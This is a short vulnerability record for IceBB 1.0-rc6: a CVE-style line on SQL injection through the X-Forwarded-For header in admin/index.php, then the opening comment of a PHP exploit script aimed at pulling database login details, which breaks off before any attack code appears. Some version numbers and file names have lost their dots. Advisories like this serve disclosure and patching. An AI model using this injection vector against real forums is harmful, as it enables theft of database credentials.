SQL injection vulnerability in admin/index.php in IceBB 1.0-rc6 allows remote malicious users to execute arbitrary SQL commands via the X-Forwarded-For HTTP header.
<?php
/*---------------------------------------------------------*\
IceBB 10-rc6 - Database Authentication Details Exploit
[|Description:|]
A security breach has been discoverd in IceBB 10-rc6
This breach is caused by a bad filtering of the X-Forwarded-For variable:
> /includes/functionsphp, line 73
$ip = empty($_SERVER['HTTP_X_FORWAR ...